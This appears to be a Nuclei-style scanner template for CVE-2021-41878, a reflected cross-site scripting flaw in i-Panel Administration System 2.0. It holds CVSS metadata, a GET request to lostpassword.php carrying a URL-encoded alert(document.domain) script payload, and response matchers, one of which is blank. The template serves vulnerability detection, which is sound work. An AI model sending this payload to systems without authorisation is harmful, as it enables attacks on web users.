id: CVE-2021-41878 info: name: i-Panel Administration System - Reflected XSS author: madrobot severity: medium description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. reference: - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-41878 cwe-id: CWE-79 tags: cve,cve2021,justwriting,xss requests: - method: GET path: - '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body - type: word words: - "text/html" part: header